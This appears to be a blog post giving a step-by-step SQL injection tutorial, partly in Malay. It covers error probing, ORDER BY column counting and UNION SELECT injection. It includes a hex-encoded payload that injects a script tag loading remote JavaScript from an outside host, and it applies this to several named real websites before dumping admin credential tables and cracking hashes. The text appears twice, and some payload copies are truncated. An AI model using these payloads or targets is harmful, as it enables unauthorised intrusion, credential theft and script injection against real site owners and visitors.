Tool:
Must have Old Version of firefox ( >4 ) Ex: firefox 3.6 or safari
Hacking Code:
----------------
%28%280x3c73637269707420747970653d22746578742f6a61766173637269707422207372633d22687474703a2f2f796f75726a6 176617363726970742e636f6d2f3131333031323032303231322f73716c2e6a73223e3c2f7363726970743e%29%29
Method:
---------
Check for vulnerable in websites?
In order to check for the vulnerabilities in website we should do the followings
http://www.targetdomain.com/index.php?id=4′
we can use ‘ this strings for check any vulnerabilities in the target website or using ” char,this will showing some error in the database connection.
let say we found vulnerable sites, then we can extract information from database and gain some confidential data.
First.
-----
We need to find the how many columns in the database
http://www.targetdomain.com/index.php?id=4 order by 1–
and we will increasing the number until we get an error.
http://www.targetdomain.com/index.php?id=4 order by 5–
http://www.targetdomain.com/index.php?id=4 order by 10–
Second.
---------
We need to find the highest ‘order by’ number without the error. For this example lets assume that i got an error at ‘order by 11–’ which means i then need to replace that 11 with a 10 again (which was the highest number i could put in without getting any errors). That is the amount of columns in the database!
Third.
-------
So let say there are 10 columns in database.Now we need to find out which columns that are vulnerable to SQL injection. We will use this query.
http://www.targetdomain.com/index.php?id=-4 union select 1,2,3,4,5,6,7,8,9,10–
Notice that i put a single – in front of the id number (id=-4)
Since there is no page with the id -4 it simply put just clears the sites text for us. That makes it easier for us to find the data that we are looking for.
Okay lets say the numbers 3, 6 and 9 popped up on the site. These are the vulnerable tables. So, we put this code (in either 1 of the vulnerable tables but i chose 3 for this example)
http://www.targetdomain.com/index.php?id=-4 union select all 1,2,
%28%280x3c73637269707420747970653d22746578742f6a61766173637269707422207372633d22687474703a2f2f796f75726a6 176617363726970742e636f6d2f3131333031323032303231322f73716c2e6a73223e3c28f7363726970743e%29%29,4,5,6,7,8, 9,10--
Example website:
--------------------
http://www.madhop.com/en/news.php?act=detail&id=-193 union select all 1,2,3,4,5,%28%280x3c73637269707420747970653d22746578742f6a61766173637269707422207372633d22687474703a2f2f7 96f75726a6176617363726970742e636f6d2f3131333031323032303231322f73716c2e6a73223e3c2f7363726970743e%29%29,7 ,8,9,10,11,12,13,14,15,16,17,18,19--
Click Table Website Tu
Bukan information_schema ya :D!!
Tengok Gambar Di Bawah :D
Now, you can find the database for this website. To find the username and password, try click example: madhop_db
You will find this column
* admin_user
* album
* banner
* category
* color_table
* countries
* currency_tbl,
* download_detail
* download_list
* gallery_detail
* member
* news
* news_category
* order_detail
* order_list
* product
* product_photo
* province_tbl
* shop
* video
* video_category
* webboard_forum
* webboard_forumen
* webboard_topic
* webboard_topicen
Now we have some tables information and we need to have a small brain to find the tables. :p
Example : admin_user, tblUser, tblAdmin, etc
Click admin_user, Once we found the actual table (username,password,etc) click start.
Walla!,we have the admin login. You can find the password using "read files" method.
Click "read files" on above in this page and click load file.
Anda Dah Dapat Username/Password :D
If the data is encrypted we need to find some md5decrypter online.To find admin we can use tools like havij,admin page finder,etc.
EXAMPLE:
-----------
http://www.madhop.com/en/news.php?act=detail&id=-193 union select all 1,2,3,4,5,%28%280x3c73637269707420747970653d22746578742f6a61766173637269707422207372633d22687474703a2f2f7 96f75726a6176617363726970742e636f6d2f3131333031323032303231322f73716c2e6a73223e3c2f7363726970743e%29%29,7 ,8,9,10,11,12,13,14,15,16,17,18,19--
http://sju.ca/about/ news.php?id=-80+union+select+all+1,2,%28%280x3c73637269707420747970653d22746578742f6a617661736372697074222 07372633d22687474703a2f2f796f75726a6176617363726970742e636f6d2f3131333031323032303231322f73716c2e6a73223e 3c2f7363726970743e%29%29,4--
http://www.entp.edu.dz/actualite/ news.php?id=-44%20union%20select%20all%201,2,3,4,%28%280x3c73637269707420747970653d22746578742f6a617661736 37269707422207372633d22687474703a2f2f796f75726a6176617363726970742e636f6d2f3131333031323032303231322f7371 6c2e6a73223e3c2f7363726970743e%29%29--
http://www.calponycars.com/ prodDetail.php?prodId=-349%20union%20select%20all%201,2,3,4,5,6,7,8,9,10,11,12,%28%280x3c73637269707420747 970653d22746578742f6a61766173637269707422207372633d22687474703a2f2f796f75726a6176617363726970742e636f6d2f 3131333031323032303231322f73716c2e6a73223e3c2f7363726970743e%29%29--
Credit by p4Ng5 H1t4m a.k.a 4p13h Mh-Cr3w
Must have Old Version of firefox ( >4 ) Ex: firefox 3.6 or safari
Hacking Code:
----------------
%28%280x3c73637269707420747970653d22746578742f6a61766173637269707422207372633d22687474703a2f2f796f75726a6
Method:
---------
Check for vulnerable in websites?
In order to check for the vulnerabilities in website we should do the followings
http://www.targetdomain.com/index.php?id=4′
we can use ‘ this strings for check any vulnerabilities in the target website or using ” char,this will showing some error in the database connection.
let say we found vulnerable sites, then we can extract information from database and gain some confidential data.
First.
-----
We need to find the how many columns in the database
http://www.targetdomain.com/index.php?id=4 order by 1–
and we will increasing the number until we get an error.
http://www.targetdomain.com/index.php?id=4 order by 5–
http://www.targetdomain.com/index.php?id=4 order by 10–
Second.
---------
We need to find the highest ‘order by’ number without the error. For this example lets assume that i got an error at ‘order by 11–’ which means i then need to replace that 11 with a 10 again (which was the highest number i could put in without getting any errors). That is the amount of columns in the database!
Third.
-------
So let say there are 10 columns in database.Now we need to find out which columns that are vulnerable to SQL injection. We will use this query.
http://www.targetdomain.com/index.php?id=-4 union select 1,2,3,4,5,6,7,8,9,10–
Notice that i put a single – in front of the id number (id=-4)
Since there is no page with the id -4 it simply put just clears the sites text for us. That makes it easier for us to find the data that we are looking for.
Okay lets say the numbers 3, 6 and 9 popped up on the site. These are the vulnerable tables. So, we put this code (in either 1 of the vulnerable tables but i chose 3 for this example)
http://www.targetdomain.com/index.php?id=-4 union select all 1,2,
%28%280x3c73637269707420747970653d22746578742f6a61766173637269707422207372633d22687474703a2f2f796f75726a6
Example website:
--------------------
http://www.madhop.com/en/news.php?act=detail&id=-193 union select all 1,2,3,4,5,%28%280x3c73637269707420747970653d22746578742f6a61766173637269707422207372633d22687474703a2f2f7
Click Table Website Tu
Bukan information_schema ya :D!!
Tengok Gambar Di Bawah :D
Now, you can find the database for this website. To find the username and password, try click example: madhop_db
You will find this column
* admin_user
* album
* banner
* category
* color_table
* countries
* currency_tbl,
* download_detail
* download_list
* gallery_detail
* member
* news
* news_category
* order_detail
* order_list
* product
* product_photo
* province_tbl
* shop
* video
* video_category
* webboard_forum
* webboard_forumen
* webboard_topic
* webboard_topicen
Now we have some tables information and we need to have a small brain to find the tables. :p
Example : admin_user, tblUser, tblAdmin, etc
Click admin_user, Once we found the actual table (username,password,etc) click start.
Walla!,we have the admin login. You can find the password using "read files" method.
Click "read files" on above in this page and click load file.
Anda Dah Dapat Username/Password :D
If the data is encrypted we need to find some md5decrypter online.To find admin we can use tools like havij,admin page finder,etc.
EXAMPLE:
-----------
http://www.madhop.com/en/news.php?act=detail&id=-193 union select all 1,2,3,4,5,%28%280x3c73637269707420747970653d22746578742f6a61766173637269707422207372633d22687474703a2f2f7
http://sju.ca/about/
http://www.entp.edu.dz/actualite/
http://www.calponycars.com/
Credit by p4Ng5 H1t4m a.k.a 4p13h Mh-Cr3w
No comments:
Post a Comment